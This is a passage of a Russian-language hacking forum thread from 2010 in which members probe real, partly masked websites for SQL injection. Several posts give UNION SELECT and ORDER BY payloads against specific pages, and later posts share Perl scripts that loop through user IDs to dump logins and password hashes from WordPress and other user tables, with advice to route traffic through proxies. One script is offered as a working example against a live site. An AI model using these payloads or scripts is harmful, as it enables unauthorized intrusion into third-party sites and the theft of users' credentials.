Старый 16.11.2010, 15:39   #571
skM
 
Регистрация: 06.07.2010
Сообщений: 95
Репутация: 8
По умолчанию

Цитата:
http://***.ru/arendaview_elit.php?anketa_id=45
http://***.ru/arendaview_elit.php?anketa_id=46-1
есть здесь инъекция?

Последний раз редактировалось Twost; 16.05.2013 в 08:06..
skM вне форума   Ответить с цитированием
Старый 16.11.2010, 15:46   #572
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Да____
Цитата:
http://***.ru/arendaview_elit.php?anketa_id=-45%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--

Последний раз редактировалось Twost; 16.05.2013 в 08:06..
SynQ вне форума   Ответить с цитированием
Старый 16.11.2010, 15:56   #573
z0mbyak
 
Регистрация: 10.11.2010
Сообщений: 21
Репутация: 11
По умолчанию

Цитата:
Цитата:
http://***.ru/arendaview_elit.php?anketa_id=45
http://***.ru/arendaview_elit.php?anketa_id=46-1
есть здесь инъекция?
Там по ордер бай легко проверить, например:
http://***.ru/arendaview_elit.php?anketa_id=45+order+by+90--
Пишет:
Цитата:
Информация по выбранной Вами анкете временно заблокирована.
,
а вот при http://***.ru/arendaview_elit.php?anketa_id=45+order+by+88-- выдает тоже самое, что и при http://***.ru/arendaview_elit.php?anketa_id=45 , соответственно кол-во полей = 88

Последний раз редактировалось Twost; 16.05.2013 в 08:07..
z0mbyak вне форума   Ответить с цитированием
Старый 17.11.2010, 18:49   #574
525
 
Регистрация: 06.07.2010
Сообщений: 34
Репутация: 0
По умолчанию

Цитата:
Сообщение от Jokester Посмотреть сообщение
И что, сработало?
хз не пробував
525 вне форума   Ответить с цитированием
Старый 17.11.2010, 19:19   #575
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Цитата:
Сообщение от 525 Посмотреть сообщение
хз не пробував
я ж тобі в isq не раз писав О_о.



хотя ходят слухи что есть експлоиты под эту ветку?
мб кто нить знает, а то в последнее время много попадалось, интересно просто.
XSS это понятно.
[сори за оффтоп]
}{оттабыч вне форума   Ответить с цитированием
Старый 17.11.2010, 19:44   #576
pinch
 
Регистрация: 02.11.2010
Сообщений: 20
Репутация: 2
По умолчанию

посоветуйте программу или скрипт для слива бд. Чтоб прога сливала через where+id
http://site.ru/news.php?id=1+union+select+1,2,name,4+from+users+w here+id={index}--
а не через limit.

или как вывести одним запросом 250k пользователей?
pinch вне форума   Ответить с цитированием
Старый 17.11.2010, 20:00   #577
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

PHP код:
#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua LWP::UserAgent->new;

#my $proxy="http://xx.xxx.xxx.xxx:port"; # лучше с прокси
#$ua->proxy(['http','https'],$proxy);

my $i=0;# начать с
my $j=2500000;# ко-во
my $sleep=2# задержка
while($i<=$j)
{
 
my $req HTTP::Request->new(GET => "http://[host]/[path]/{union+select...} where id=$i[комент]");
 
my $res $ua->request($req);
 
sleep($sleep);

 if (
$res->as_string =~ /[подточить под себя](.+)[подточить под себя]/)
 {
 
open(FILE,'>>res.txt');
 print 
"print $i: $1\n";
 print 
FILE "$1\n";
 
close(FILE);
 
$i++;
 }
  else{
$i++;}

Смысл скрипта в том что можно под себя настоить с обходом разных штук что блочат запросы.
}{оттабыч вне форума   Ответить с цитированием
Старый 17.11.2010, 20:26   #578
pinch
 
Регистрация: 02.11.2010
Сообщений: 20
Репутация: 2
По умолчанию

PHP код:
#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua LWP::UserAgent->new;

#my $proxy="http://xx.xxx.xxx.xxx:port"; # лучше с прокси
#$ua->proxy(['http','https'],$proxy);

my $i=0;# начать с
my $j=5;# ко-во
my $sleep=2# задержка
while($i<=$j)
{
 
my $req HTTP::Request->new(GET => "http://mysql/mynews.php?id=2+union+select+1,2,3,4,concat(user_login,0x3a,user_pass)+from+wordpress284.wp_users+where+ID=$i--");
 
my $res $ua->request($req);
 
sleep($sleep);

 if (
$res->as_string =~/(.*?):(\w{32})/)
 {
 
open(FILE,'>>res.txt');
 print 
"print $i: $1\n";
 print 
FILE "$1\n";
 
close(FILE);
 
$i++;
 }

при запуске тупо виснет
pinch вне форума   Ответить с цитированием
Старый 17.11.2010, 20:46   #579
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

PHP код:
#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua LWP::UserAgent->new;

#my $proxy="http://xx.xxx.xxx.xxx:port"; # лучше с прокси
#$ua->proxy(['http','https'],$proxy);

my $i=39;# начать с
my $j=46;# ко-во
my $sleep=2# задержка
while($i<=$j)
{
 
my $req HTTP::Request->new(GET => "http://www.***.com/products/product.php?pid=192%20and%200%20UnIon+selECt+1,2,3,4,5,6,7,8,concat_ws%280x3a,username,password%29%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20from%20phpauthent_users%20where%20id=$i%20-- ");
 
my $res $ua->request($req);
 
sleep($sleep);

 if (
$res->as_string =~ /<div id=\"new_prod_text\">(.+)<\/div>/)
 {
 open(FILE,'>>res.txt');
 print "
print $i: $1\n";
 print FILE "
$1\n";
 close(FILE);
 
$i++;
 }
  else
{$i++;}

Ня рабочий пример, но помни что намусориш в логах сильно.
Кстате не боян иньекция.

Последний раз редактировалось Twost; 16.05.2013 в 08:09..
}{оттабыч вне форума   Ответить с цитированием
Старый 17.11.2010, 22:34   #580
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Цитата:
http://***.ru/infoneeds/guests/selectspeciality.jsp?fid=12'
Яву кто-нить хекал?

Последний раз редактировалось Twost; 16.05.2013 в 08:09..
Cross вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot